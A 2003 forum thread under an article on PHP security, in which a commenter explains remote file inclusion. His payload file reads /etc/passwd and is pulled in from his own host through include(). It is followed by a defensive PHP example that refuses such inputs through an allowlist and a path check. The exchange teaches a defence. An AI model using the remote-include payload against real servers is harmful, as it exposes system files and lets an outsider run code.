Article: Ten Security Checks for PHP, Part 1
Subject: Not the kind of article i would expect from o'reilly!
Date: 2003-03-29 05:08:06
From: anonymous2
Response to: Not the kind of article i would expect from o'reilly!

Include *can* harm your server, read the comments in the PHP documentation before you spread misinformation:
Not the kind of article i would expect from o'reilly!
2003-05-23 00:10:42 clancymalcolm

I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>
Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.
Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");
Then YOUR web server will show me its /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.
Clancy.
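
The remote include described in the post above only works when a request-controlled string reaches include(). The block below is an added example, not code from the article or from anyone in this thread: it resolves a page name through an allowlist and a directory containment check before including it. The function name resolve_include, the page names and the temporary directory are assumptions made for the demonstration.

```php
<?php
// Added example: hypothetical helper names; not from the article or the thread.
// Deployment setting that blocks include() of http:// and ftp:// URLs (php.ini):
//   allow_url_include = Off

/**
 * Map a user-supplied page name to a local file that is safe to include.
 * Returns the absolute path, or null when the request must be refused.
 */
function resolve_include(string $requested, string $baseDir, array $allowedPages): ?string
{
    // 1. Allowlist: only names the application knows about are accepted,
    //    so "http://www.mywebserver.com/crack.txt" never reaches include().
    if (!in_array($requested, $allowedPages, true)) {
        return null;
    }

    // 2. Containment: the resolved path must stay inside $baseDir,
    //    which also catches symlinks pointing elsewhere.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // missing directory or missing page file
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory with one legitimate page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo \"home page\\n\";");

$allowed = ['home', 'about'];
$inputs  = ['home', 'http://www.mywebserver.com/crack.txt', '../../etc/passwd', 'about'];
foreach ($inputs as $input) {
    $target = resolve_include($input, $dir, $allowed);
    if ($target === null) {
        echo "refused: $input\n";
        continue;
    }
    include $target; // only reached for an allowlisted file inside $dir
}

unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

Only "home" is included; the URL and the traversal string fail the allowlist, and "about" is refused because no such file exists in the pages directory.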